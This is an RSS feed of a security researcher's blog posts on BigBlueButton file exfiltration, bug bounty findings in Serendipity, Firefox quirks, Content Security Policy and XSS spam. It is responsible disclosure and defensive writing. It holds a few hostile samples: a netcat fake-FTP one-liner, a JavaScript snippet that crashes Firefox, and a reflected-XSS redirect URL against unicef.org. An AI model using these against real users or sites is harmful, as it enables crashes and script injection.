<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    
    <title>Hanno's blog (Entries tagged as xss)</title>
    <link>https://blog.hboeck.de/</link>
    <description></description>
    <dc:language>en</dc:language>
    <generator>Serendipity 2.5.0 - http://www.s9y.org/</generator>
    <pubDate>Wed, 05 Oct 2022 14:47:57 GMT</pubDate>

    <image>
    <url>https://blog.hboeck.de/templates/hanno/img/s9y_banner_small.png</url>
    <title>RSS: Hanno's blog - </title>
    <link>https://blog.hboeck.de/</link>
    <width>100</width>
    <height>21</height>
</image>

<item>
    <title>File Exfiltration via Libreoffice in BigBlueButton and JODConverter</title>
    <link>https://blog.hboeck.de/archives/902-File-Exfiltration-via-Libreoffice-in-BigBlueButton-and-JODConverter.html</link>
            <category>Code</category>
            <category>English</category>
            <category>Linux</category>
            <category>Security</category>
    
    <comments>https://blog.hboeck.de/archives/902-File-Exfiltration-via-Libreoffice-in-BigBlueButton-and-JODConverter.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=902</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=902</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    &lt;!-- s9ymdb:496 --&gt;&lt;img class=&quot;serendipity_image_right&quot; width=&quot;300&quot; height=&quot;303&quot;  src=&quot;https://blog.hboeck.de/uploads/bluebutton.jpg&quot;  alt=&quot;Blue Button&quot;&gt;BigBlueButton is a free web-based video conferencing software that lately got quite popular, largely due to Covid-19. Earlier this year I did a brief check on its security which led to an &lt;a href=&quot;https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html&quot;&gt;article on Golem.de (German)&lt;/a&gt;. I want to share the most significant findings here.&lt;br /&gt;
&lt;br /&gt;
BigBlueButton has a feature that lets a presenter upload a presentation in a wide variety of file formats that gets then displayed in the web application. This looked like a huge attack surface. The conversion for many file formats is done with Libreoffice on the server. Looking for ways to exploit server-side Libreoffice rendering I found a &lt;a href=&quot;https://buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/&quot;&gt;blog post by Bret Buerhaus&lt;/a&gt; that discussed a number of ways of exploiting such setups.&lt;br /&gt;
&lt;br /&gt;
One of the methods described there is a feature in Opendocument Text (ODT) files that allows embedding a file from an external URL in a text section. This can be a web URL like https or a file url and include a local file.&lt;br /&gt;
&lt;br /&gt;
This directly worked in BigBlueButton. An ODT file that referenced a local file would display that local file. This allows displaying any file that the user running the BigBlueButton service could access on the server. A possible way to exploit this is to exfiltrate the configuration file that contains the API secret key, which then allows basically controlling the BigBlueButton instance. I have a &lt;a href=&quot;https://www.youtube.com/watch?v=op2hc2Z56a8&quot;&gt;video showing the exploit here&lt;/a&gt;. (I will publish the exploit later.)&lt;br /&gt;
&lt;br /&gt;
I reported this to the developers of BigBlueButton in May. Unfortunately my experience with their security process was not very good. At first I did not get an answer at all. After another mail they told me they plan to sandbox the Libreoffice process either via a chroot or a docker container. However that still has not happened yet. It is planned for the upcoming version 2.3 and independent of this bug this is a good idea, as Libreoffice just creates a lot of attack surface.&lt;br /&gt;
&lt;br /&gt;
Recently I looked a bit more into this.  The functionality to include external files only happens after a manual user confirmation and if one uses Libreoffice on the command line it does not work at all by default. So in theory this exploit should not have worked, but it did.&lt;br /&gt;
&lt;br /&gt;
It turned out the reason for this was another piece of software that BigBlueButton uses called &lt;a href=&quot;https://github.com/jodconverter/jodconverter&quot;&gt;JODConverter&lt;/a&gt;. It provides a wrapper around the conversion functionality of Libreoffice. After contacting both the Libreoffice security team and the developer of JODConverter we figured out that it enables including external URLs by default.&lt;br /&gt;
&lt;br /&gt;
I forwarded this information to the BigBlueButton developers and it finally let to a fix, they now change the default settings of JODConverter manually. The JODConverter developer considers changing the default as well, but this has not happened yet. Other software or web pages using JODConverter for serverside file conversion may thus still be vulnerable.&lt;br /&gt;
&lt;br /&gt;
The fix was included in version 2.2.27. Today I learned that the company RedTeam Pentesting &lt;a href=&quot;https://www.redteam-pentesting.de/en/advisories/rt-sa-2020-005/-arbitrary-file-disclosure-and-server-side-request-forgery-in-bigbluebutton&quot;&gt;has later independently found the same vulnerability&lt;/a&gt;. They also requested a CVE: It is now filed as CVE-2020-25820.&lt;br /&gt;
&lt;br /&gt;
While this issue is fixed, the handling of security issues by BigBlueButton was not exactly stellar. It took around five months from my initial report to a fix. The &lt;a href=&quot;https://github.com/bigbluebutton/bigbluebutton/releases/tag/v2.2.27&quot;&gt;release notes&lt;/a&gt; do not mention that this is an important security update (the change has the note “speed up the conversion”).&lt;br /&gt;
&lt;br /&gt;
I found a bunch of other security issues in BigBlueButton and proposed some hardening changes. This took a lot of back and forth, but all significant issues are resolved now.&lt;br /&gt;
&lt;br /&gt;
Another issue with the presentation upload was that it allowed cross site scripting, because it did not set a proper content type for downloads. This was independently discovered by another person and was fixed a while ago. (If you are interested in details about this class of vulnerabilities: I have given &lt;a href=&quot;https://www.youtube.com/watch?v=8t8JYpt0egE&quot;&gt;a talk about it at last year’s Security Fest&lt;/a&gt;.)&lt;br /&gt;
&lt;br /&gt;
The session Cookies both from BigBlueButton itself and from its default web frontend Greenlight were not set with a secure flag, so the cookies could be transmitted in clear text over the network. This has also been changed now.&lt;br /&gt;
&lt;br /&gt;
By default the BigBlueButton installation script starts several services that open ports that do not need to be publicly accessible. This is now also changed. A freeswitch service run locally was installed with a default password (“ClueCon”), this is now also changed to a random password by the installation script.&lt;br /&gt;
&lt;br /&gt;
What also looks quite problematic is the use of outdated software. BigBlueButton only works on Ubuntu 16.04, which is a long term support version, so it still receives updates. But it also uses several external repositories, including one that installs NodeJS version 8 and shows a warning that this repository no longer receives security updates. There is an &lt;a href=&quot;https://github.com/bigbluebutton/bbb-install/issues/109&quot;&gt;open bug in the bug tracker&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
If you are using BigBlueButton I strongly recommend you update to at least version 2.2.27. This should fix all the issues I found. I would wish that the BigBlueButton developers improve their security process, react more timely to external reports and more transparent when issues are fixed.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://commons.wikimedia.org/wiki/File:Porpita_porpita.jpg&quot;&gt;Image Source: Wikimedia Commons / NOAA / Public Domain&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Update:&lt;/b&gt; &lt;a href=&quot;https://github.com/hannob/CVE-2020-27603-bbb-libreoffice-poc&quot;&gt;Proof of concept published&lt;/a&gt;. 
    </content:encoded>

    <pubDate>Wed, 21 Oct 2020 14:14:00 +0200</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/902-guid.html</guid>
    <category>bigbluebutton</category>
<category>cookie</category>
<category>fileexfiltration</category>
<category>itsecurity</category>
<category>jodconverter</category>
<category>libreoffice</category>
<category>security</category>
<category>websecurity</category>
<category>xss</category>

</item>
<item>
    <title>How my personal Bug Bounty Program turned into a Free Security Audit for the Serendipity Blog</title>
    <link>https://blog.hboeck.de/archives/896-How-my-personal-Bug-Bounty-Program-turned-into-a-Free-Security-Audit-for-the-Serendipity-Blog.html</link>
            <category>English</category>
            <category>Security</category>
    
    <comments>https://blog.hboeck.de/archives/896-How-my-personal-Bug-Bounty-Program-turned-into-a-Free-Security-Audit-for-the-Serendipity-Blog.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=896</wfw:comment>

    <slash:comments>1</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=896</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    HackerOne is currently one of the most popular bug bounty program platforms. While the usual providers of bug bounty programs are companies, w while ago I noted that &lt;a href=&quot;https://hackerone.com/arkadiyt-projects&quot;&gt;some&lt;/a&gt; &lt;a href=&quot;https://hackerone.com/ed&quot;&gt;people&lt;/a&gt; were running bug bounty programs on Hacker One for their private projects without payouts. It made me curious, so I decided to start one with some of my private web pages in scope.&lt;img src=&quot;https://ssl-vg03.met.vgwort.de/na/2a54411ab91e421eae6e529a7e5b6d55&quot; width=&quot;1&quot; height=&quot;1&quot; alt=&quot;&quot;/&gt;&lt;br /&gt;
&lt;br /&gt;
The HackerOne process requires programs to be private at first, starting with a limited number of invites. Soon after I started the program the first reports came in. Not surprisingly I got plenty of false positives, which I tried to limit by documenting the scope better in the program description. I also got plenty of web security scanner payloads via my contact form. But more to my surprise I also got a number of very high quality reports.&lt;br /&gt;
&lt;br /&gt;
&lt;!-- s9ymdb:482 --&gt;&lt;img class=&quot;serendipity_image_right&quot; width=&quot;300&quot; height=&quot;211&quot;  src=&quot;https://blog.hboeck.de/uploads/s9y-logo.png&quot;  alt=&quot;S9Y&quot;&gt;This blog and two other sites in scope use &lt;a href=&quot;https://docs.s9y.org/&quot;&gt;Serendipity&lt;/a&gt; (also called S9Y), a blog software written in PHP. Through the bug bounty program I got reports for an &lt;a href=&quot;https://hackerone.com/reports/373916&quot;&gt;Open Redirect&lt;/a&gt;, an &lt;a href=&quot;https://hackerone.com/reports/374100&quot;&gt;XSS in the start page&lt;/a&gt;, an &lt;a href=&quot;https://hackerone.com/reports/373950&quot;&gt;XSS in the back end&lt;/a&gt;, an &lt;a href=&quot;https://hackerone.com/reports/374748&quot;&gt;SQL injection in the back end&lt;/a&gt; and &lt;a href=&quot;https://hackerone.com/reports/374027&quot;&gt;another SQL injection in the freetag plugin&lt;/a&gt;. All of those were legitimate vulnerabilities in Serendipity and some of them quite severe. I forwarded the reports to the Serendipity developers.&lt;br /&gt;
&lt;br /&gt;
Fixes are available by now, the first round of fixes were released with &lt;a href=&quot;https://blog.s9y.org/archives/278-Serendipity-2.1.3-released.html&quot;&gt;Serendipity 2.1.3&lt;/a&gt; and another issue got fixed in &lt;a href=&quot;https://blog.s9y.org/archives/280-Serendipity-2.1.4-and-2.2.1-alpha1-released.html&quot;&gt;2.1.4&lt;/a&gt;. The freetag plugin was updated to &lt;a href=&quot;https://blog.s9y.org/archives/279-serendipity_event_freetag-Security-update.html&quot;&gt;version 2.69&lt;/a&gt;. If you use Serendipity please make sure you run the latest versions.&lt;br /&gt;
&lt;br /&gt;
I&#039;m not always happy with the way the bug bounty platforms work, yet it seems they have attracted an active community of security researchers who are also willing to occasionally look at projects without financial reward. While it&#039;s questionable when large corporations run bug bounty programs without rewards, I think that it&#039;s totally fine for private projects and volunteer-run free and open source projects.&lt;br /&gt;
&lt;br /&gt;
The conclusion I take from this is that likely more projects should try to make use of the bug bounty community. Essentially Serendipity got a free security audit and is more secure now. It got this through the indirection of my personal bug bounty program, but of course this could also work directly. Free software projects could start their own bug bounty program, and when it&#039;s about web applications ideally they should have have a live installation of their own product in scope.&lt;br /&gt;
&lt;br /&gt;
In case you find some security issue with my web pages I &lt;a href=&quot;https://hackerone.com/hannob&quot;&gt;welcome reports&lt;/a&gt;. And special thanks to Brian Carpenter (Geeknik), Julio Cesar and oreamnos for making my blog more secure. 
    </content:encoded>

    <pubDate>Mon, 12 Nov 2018 09:22:00 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/896-guid.html</guid>
    <category>bugbounty</category>
<category>hackerone</category>
<category>security</category>
<category>serendipity</category>
<category>sqlinjection</category>
<category>websecurity</category>
<category>xss</category>

</item>
<item>
    <title>Some minor Security Quirks in Firefox</title>
    <link>https://blog.hboeck.de/archives/891-Some-minor-Security-Quirks-in-Firefox.html</link>
            <category>English</category>
            <category>Linux</category>
            <category>Security</category>
    
    <comments>https://blog.hboeck.de/archives/891-Some-minor-Security-Quirks-in-Firefox.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=891</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=891</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    &lt;img src=&quot;https://blog.hboeck.de/uploads/firefox-logo.svg&quot; width=&quot;200&quot; height=&quot;200&quot; alt=&quot;Firefox&quot; style=&quot;float:right;&quot;&gt;I discovered a couple of more or less minor security issues in Firefox lately. None of them is particularly scary, but they affect interesting corner cases or unusual behavior. I&#039;m posting this mainly hoping that other people will find it inspiring to think about unusual security issues and maybe also come up with more realistic attack scenarios for these bugs.&lt;img src=&quot;https://ssl-vg03.met.vgwort.de/na/c1c4ff014dbe488ba0d564ceaf1a85a2&quot; width=&quot;1&quot; height=&quot;1&quot; alt=&quot;&quot;/&gt;&lt;br /&gt;
&lt;br /&gt;
I&#039;d like to point out that Mozilla hasn&#039;t fixed most of those issues, despite all of them being reported several months ago.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bypassing XSA warning via FTP&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
XSA or Cross-Site Authentication is an interesting and not very well known attack. It&#039;s been &lt;a href=&quot;https://www.joachim-breitner.de/blog/56-Like_XSS%2C_just_simpler_and_harder_to_prevent__The_Cross_Site_Auth_%28XSA%29_Attack&quot;&gt;discovered by Joachim Breitner in 2005&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Some web pages, mostly forums, allow users to include third party images. This can be abused by an attacker to steal other user&#039;s credentials. An attacker first posts something with an image from a server he controls. He then switches on HTTP authentication for that image. All visitors of the page will now see a login dialog on that page. They may be tempted to type in their login credentials into the HTTP authentication dialog, which seems to come from the page they trust.&lt;br /&gt;
&lt;br /&gt;
The original XSA attack is, as said, quite old. As a countermeasure Firefox implements a warning in HTTP authentication dialogs that were created by a subresource like an image. However it only does that for HTTP, not for FTP.&lt;br /&gt;
&lt;br /&gt;
So an attacker can run an FTP server and include an image from there. By then requiring an FTP login and logging all login attempts to the server he can gather credentials. The password dialog will show the host name of the attacker&#039;s FTP server, but he could choose one that looks close enough to the targeted web page to not raise suspicion.&lt;br /&gt;
&lt;br /&gt;
&lt;!-- s9ymdb:469 --&gt;&lt;img class=&quot;serendipity_image_center&quot; width=&quot;464&quot; height=&quot;163&quot;  src=&quot;https://blog.hboeck.de/uploads/firefox-ftp-password.png&quot;  alt=&quot;Firefox FTP password dialog&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
I haven&#039;t found any popular site that allows embedding images from non-HTTP-protocols. The most popular page that allows embedding external images at all is Stack Overflow, but it only allows HTTPS. Generally embedding third party images is less common these days, most pages keep local copies if they embed external images.&lt;br /&gt;
&lt;br /&gt;
This &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=1361848&quot;&gt;bug is yet unfixed&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Obviously one could fix it by showing the same warning for FTP that is shown for HTTP authentication. But I&#039;d rather recommend to completely block authentication dialogs on third party content. This is also what Chrome is doing. Mozilla has been &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=647010&quot;&gt; discussing this for several years with no result&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Firefox also has an &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=1404744&quot;&gt;open bug about disallowing FTP on subresources&lt;/a&gt;. This would obviously also fix this scenario.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Window-modal popup via FTP&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In the early days of JavaScript web pages could annoy users with popups. Browsers have since changed the behavior of JavaScript popups. They are now &lt;a href=&quot;https://web.archive.org/web/20171227063536/https://developer.mozilla.org/en-US/docs/Mozilla/Using_tab-modal_prompts&quot;&gt;tab-modal&lt;/a&gt;, which means they&#039;re not blocking the interaction with the whole browser, they&#039;re just part of one tab and will only block the interaction with the web page that created them.&lt;br /&gt;
&lt;br /&gt;
So it is a goal of modern browsers to not allow web pages to create window-modal alerts that block the interaction with the whole browser. However I figured out FTP gives us a bypass of this restriction.&lt;br /&gt;
&lt;br /&gt;
If Firefox receives some random garbage over an FTP connection that it cannot interpret as FTP commands it will open an alert window showing that garbage.&lt;br /&gt;
&lt;br /&gt;
&lt;!-- s9ymdb:471 --&gt;&lt;img class=&quot;serendipity_image_center&quot; width=&quot;405&quot; height=&quot;131&quot;  src=&quot;https://blog.hboeck.de/uploads/firefox-ftp-window-modal.png&quot;  alt=&quot;Window modal FTP alert&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
First we open up our fake &quot;FTP-Server&quot; that will simply send a message to all clients. We can just use netcat for this:&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;while true; do echo &quot;Hello&quot; | nc -l -p 21; done&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then we try to open a connection, e. g. by typing ftp://localhost in the address bar on the same system. Firefox will not show the alert immediately. However if we then click on the URL bar and press enter again it will show the alert window. I tried to replicate that behavior with JavaScript, which worked sometimes. I&#039;m relatively sure this can be made reliable.&lt;br /&gt;
&lt;br /&gt;
There are two problems here. One is that server controlled content is showed to the user without any interpretation. This alert window seems to be intended as some kind of error message. However it doesn&#039;t make a lot of sense like that. If at all it should probably be prefixed by some message like &quot;the server sent an invalid command&quot;. But ultimately if the browser receives random garbage instead of protocol messages it&#039;s probably not wise to display that at all. The second problem is that FTP error messages probably should be tab-modal as well.&lt;br /&gt;
&lt;br /&gt;
This &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=1362050&quot;&gt;bug is also yet unfixed&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;FTP considered dangerous&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
FTP is an old protocol with many problems. Some consider the fact that browsers still support it a problem. I tend to agree, ideally FTP should simply be removed from modern browsers.&lt;br /&gt;
&lt;br /&gt;
FTP in browsers is insecure by design. While TLS-enabled FTP exists browsers have never supported it. The FTP code is probably not well audited, as it&#039;s rarely used. And the fact that another protocol exists that can be used similarly to HTTP has the potential of surprises. For example I found it quite surprising to learn that it&#039;s possible to have unencrypted and unauthenticated FTP connections to hosts that enabled HSTS. (The lack of cookie support on FTP seems to avoid causing security issues, but it&#039;s still unexpected and feels dangerous.)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Self-XSS in bookmark manager export&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The Firefox Bookmark manager allows exporting bookmarks to an HTML document. Before the current Firefox 57 it was possible to inject JavaScript into this exported HTML via the tags field.&lt;br /&gt;
&lt;br /&gt;
I tried to come up with a plausible scenario where this could matter, however this turned out to be difficult. This would be a problematic behavior if there&#039;s a way for a web page to create such a bookmark. While it is possible to create &lt;a href=&quot;https://developer.mozilla.org/en-US/Add-ons/WebExtensions/API/bookmarks/create&quot;&gt;a bookmark dialog with JavaScript&lt;/a&gt;, this doesn&#039;t allow us to prefill the tags field. Thus there is no way a web page can insert any content here.&lt;br /&gt;
&lt;br /&gt;
One could come up with implausible social engineering scenarios (web page asks user to create a bookmark and insert some specific string into the tags field), but that seems very far fetched. A remotely plausible scenario would be a situation where a browser can be used by multiple people who are allowed to create bookmarks and the bookmarks are regularly exported and uploaded to a web page. However that also seems quite far fetched.&lt;br /&gt;
&lt;br /&gt;
This was fixed in the latest Firefox release as &lt;a href=&quot;https://www.mozilla.org/en-US/security/advisories/mfsa2017-24/#CVE-2017-7840&quot;&gt;CVE-2017-7840 and considered as low severity&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Crashing Firefox on Linux via notification API&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/notification&quot;&gt;notification API&lt;/a&gt; allows browsers to send notification alerts that the operating system will show in small notification windows. A notification can contain a small message and an icon.&lt;br /&gt;
&lt;br /&gt;
When playing this one of the very first things that came to my mind was to check what happens if one simply sends a very large icon. A user has to approve that a web page is allowed to use the notification API, however if he does the result is an immediate crash of the browser. This only &quot;works&quot; on Linux. The proof of concept is quite simple, we just embed a large black PNG via a data URI:&lt;br /&gt;
&lt;br /&gt;
&lt;code style=&quot;overflow-wrap: break-word&quot;&gt;&amp;lt;script&amp;gt;Notification.requestPermission(function(status){&lt;br /&gt;
new Notification(&quot;&quot;,{icon: &quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAE4gAABOIAQAAAAB147pmAAAL70lEQVR4Ae3BAQ0AAADCIPuntscHD&quot; + &quot;A&quot;.repeat(4043) + &quot;yDjFUQABEK0vGQAAAABJRU5ErkJggg==&quot;,});&lt;br /&gt;
});&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
I haven&#039;t fully tracked down what&#039;s causing this, but it seems that Firefox tries to send a message to the system&#039;s notification daemon with libnotify and if that&#039;s too large for the message size limit of dbus it will not properly handle the resulting error.&lt;br /&gt;
&lt;br /&gt;
What I found quite frustrating is that &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=1395940&quot;&gt;when I reported it&lt;/a&gt; I learned that this was a duplicate of &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=1282419&quot;&gt;a bug that has already been reported more than a year ago&lt;/a&gt;. I feel having such a simple browser crash bug open for such a long time is not appropriate. It is still unfixed. 
    </content:encoded>

    <pubDate>Thu, 16 Nov 2017 17:24:00 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/891-guid.html</guid>
    <category>firefox</category>
<category>ftp</category>
<category>javascript</category>
<category>mozilla</category>
<category>security</category>
<category>vulnerability</category>
<category>xsa</category>
<category>xss</category>

</item>
<item>
    <title>Some experience with Content Security Policy</title>
    <link>https://blog.hboeck.de/archives/853-Some-experience-with-Content-Security-Policy.html</link>
            <category>English</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/853-Some-experience-with-Content-Security-Policy.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=853</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=853</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    &lt;!-- s9ymdb:413 --&gt;&lt;img class=&quot;serendipity_image_right&quot; width=&quot;285&quot; height=&quot;189&quot;  src=&quot;https://blog.hboeck.de/uploads/xss.png&quot;  alt=&quot;XSS&quot; /&gt;I recently started playing around with &lt;a href=&quot;http://www.html5rocks.com/en/tutorials/security/content-security-policy/?redirect_from_locale=de&quot;&gt;Content Security Policy (CSP)&lt;/a&gt;. CSP is a very neat feature and a good example how to get IT security right.&lt;br /&gt;
&lt;br /&gt;
The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.&lt;img src=&quot;https://ssl-vg03.met.vgwort.de/na/94a23b9471f64b66a68e7fdf562983d5&quot; width=&quot;1&quot; height=&quot;1&quot; alt=&quot;&quot;/&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;CSP fixes XSS for good&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn&#039;t work. Even large websites like &lt;a href=&quot;http://b.fl7.de/2014/09/amazon-stored-xss-book-metadata.html&quot;&gt;Amazon&lt;/a&gt; or &lt;a href=&quot;http://www.golem.de/news/cross-site-scripting-sicherheitsluecke-bei-ebay-zwei-monate-offen-1405-106694.html&quot;&gt;Ebay&lt;/a&gt; don&#039;t get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn&#039;t scale.&lt;br /&gt;
&lt;br /&gt;
CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it&#039;s hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.&lt;br /&gt;
&lt;br /&gt;
To play around with it I added a CSP header to &lt;a href=&quot;https://hboeck.de/&quot;&gt;my personal webpage&lt;/a&gt;. This was a simple target, because it&#039;s a very simple webpage. I&#039;m essentially sure that my webpage is XSS free because it doesn&#039;t use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.&lt;br /&gt;
&lt;br /&gt;
For my personal webpage this is what I did (PHP code):&lt;br /&gt;
&lt;i&gt;header(&quot;Content-Security-Policy:default-src &#039;none&#039;;img-src &#039;self&#039;;style-src &#039;self&#039;;report-uri /c/&quot;);&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.&lt;br /&gt;
&lt;br /&gt;
This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:&lt;br /&gt;
&lt;i&gt;Content-Security-Policy: default-src *; script-src assets-cdn.github.com www.google-analytics.com collector-cdn.github.com; object-src assets-cdn.github.com; style-src &#039;self&#039; &#039;unsafe-inline&#039; &#039;unsafe-eval&#039; assets-cdn.github.com; img-src &#039;self&#039; data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.githubusercontent.com *.gravatar.com *.wp.com; media-src &#039;none&#039;; frame-src &#039;self&#039; render.githubusercontent.com gist.github.com www.youtube.com player.vimeo.com checkout.paypal.com; font-src assets-cdn.github.com; connect-src &#039;self&#039; ghconduit.com:25035 live.github.com uploads.github.com s3.amazonaws.com&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Reporting feature&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You may have noticed in my CSP header line that there&#039;s a &quot;report-uri&quot; command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I&#039;m looking at you &lt;a href=&quot;http://caniuse.com/contentsecuritypolicy&quot;&gt;Internet Explorer&lt;/a&gt;) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.&lt;br /&gt;
&lt;br /&gt;
While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I&#039;m almost certain my webpage has no XSS issues, so I shouldn&#039;t get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage&#039;s context. Sometimes you can spot them (when source-file starts with &quot;chrome-extension&quot; or &quot;safari-extension&quot;), sometimes you can&#039;t (source-file will only say &quot;data&quot;). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I&#039;m not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Conclusion&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn&#039;t - does yours?). CSP reporting is neat, but it&#039;s usefulness is limited due to too many false positives.&lt;br /&gt;
&lt;br /&gt;
Then there&#039;s the bigger picture of IT security in general. Fixing single security bugs doesn&#039;t work. Why? XSS is as old as JavaScript (1995) and it&#039;s still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won&#039;t have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.&lt;br /&gt;
&lt;br /&gt;
Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier &lt;a href=&quot;http://www.cs.rutgers.edu/~santosh.nagarakatte/softbound/&quot;&gt;but it is also possible&lt;/a&gt;. 
    </content:encoded>

    <pubDate>Fri, 19 Sep 2014 10:17:00 +0200</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/853-guid.html</guid>
    <category>browser</category>
<category>content-security-policy</category>
<category>csp</category>
<category>php</category>
<category>websecurity</category>
<category>xss</category>

</item>
<item>
    <title>Blog-Spam abusing XSS</title>
    <link>https://blog.hboeck.de/archives/603-Blog-Spam-abusing-XSS.html</link>
            <category>English</category>
            <category>Security</category>
    
    <comments>https://blog.hboeck.de/archives/603-Blog-Spam-abusing-XSS.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=603</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=603</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    I got some spam in the comment fields of my blog that raised my interest.&lt;br /&gt;
&lt;br /&gt;
Some sample how they looked like:&lt;br /&gt;
http://www.unicef.org/voy/search/search.php?q=some+advertising%3Cscript%3Eparent%2elocation%2ereplace%28%22http%3A%2F%2Fgoogle%2ede22%29%3C%2Fscript%3E&lt;br /&gt;
&lt;br /&gt;
